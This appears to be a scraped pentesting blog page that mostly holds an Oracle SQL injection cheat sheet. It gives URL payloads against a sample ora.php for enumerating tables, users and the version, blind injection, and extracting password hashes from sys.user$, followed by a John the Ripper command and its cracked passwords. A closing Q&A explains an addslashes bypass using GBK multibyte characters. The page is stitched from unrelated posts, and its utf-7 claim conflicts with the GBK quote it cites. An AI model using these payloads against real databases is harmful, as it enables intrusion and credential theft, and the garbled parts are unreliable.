www.notsosecure.com

I have put together some thoughts on conducting a penetration test on a windows active directory.

Currently this article focus on these 2 scenarios:-

1. A pentester is allowed to plug his laptop into the target network.

2. A pentester is not allowed to plug his laptop and only has access to a standard workstation.

You can read it as a ".doc" file here and as a pdf here.

PS: I will do a better job with editing a word document in the next version of this document.

1. Finding table names

select table_name from+user_tables

Example:-

http://192.168.2.199/ora.php?id=101+union+all+select+

table_name+from+user_tables

Blind Injection:http://192.168.2.199/ora.php?id=101 and

ascii(substr((select+table_name+from+user_tables

where rownum=1),1,1))>100

———————————————–

2. Iterating through the different rows:

Unfortunately it is not as straight forward, there is no LIMIT command in oracle.

Syntax:-select column_1, column_2 from (select rownum r_, column_1,

column_2  from table_1, table_2  where field_3 =

'some value')where r_ =2

EXAMPLE:-

http://192.168.2.199/ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME

+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM

+USER_TABLES)+WHERE+R=1

————————————————————————–

3. Finding column names:

select+column_name+from+user_tab_columns

————————————————————————–

4. Finding Version:

Select banner from v$version

———————————————————————–

5. Finding  Database user names:-
http://192.168.2.199/ora.php?id=101+union+

all+select+username,null+from+all_users

———————————————————————

6. Finding password  hashes (the user in connection string should be a dba):

select name,astatus, password from sys.user$ where astatus =0;

<# a status =0 indicates only the users who are not locked)

example:-http://192.168.2.199/ora.php?id=101+union

+all+select+name||'–'||password+from+sys.user$

In the above example: i had only one column to select a string from database, so i had concatenated the

username and password field together separated with '–'.

—————————————————————————-

7. Cracking passwords using john the ripper:-

thanks to pentestmonkey for this

$ ./john –rules –wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt–format=oracle ~/opass

Loaded 14 password hashes with 14 different salts (Oracle [oracle])DIP              (DIP)ORACLE           (FLOWS_020100)ORACLE           (FLOWS_FILES)ORACLE           (XDB)ORACLE           (CTXSYS)PASSWORD         (HR)PASSWORD         (SYSTEM)PASSWORD         (SYS)TEST             (TEST2)TEST1            (TEST1)
——————————————————————————
what else you want from a SQL Injection

SQL Injection In Ingres

SQL Injection In DB2

Query:- There is a web application vulnerable to SQL Injection, but the web server has added protection like magic_quotes or the application calls the function add_slashes, which means i can't insert  a single quote and thus cant exploit a SQL Injection. The injection point is in a string field. Does it means, its safe??????

Answer:- To the best of my knowledge, it is safe if your application supports utf-8 encoding(which is most common). However, if it supports utf-7 encoding, it becomes vulnerable. This is best described by Chris Shifflett:-

http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

"In GBK, 0xbf27 is not a valid multi-byte character, but 0xbf5c is. Interpreted as single-byte characters, 0xbf27 is 0xbf (¿) followed by 0×27 ('), and 0xbf5c is 0xbf (¿) followed by 0×5c (\).

How does this help? If I want to attempt an SQL injection attack against a MySQL database, having single quotes escaped with a backslash is a bummer. If you're using addslashes(), however, I'm in luck. All I need to do is inject something like 0xbf27, and addslashes() modifies this to become 0xbf5c27, a valid multi-byte character followed by a single quote. In other words, I can successfully inject a single quote despite your escaping. That's because 0xbf5c is interpreted as a single character, not two. Oops, there goes the backslash."

Well Done Chris..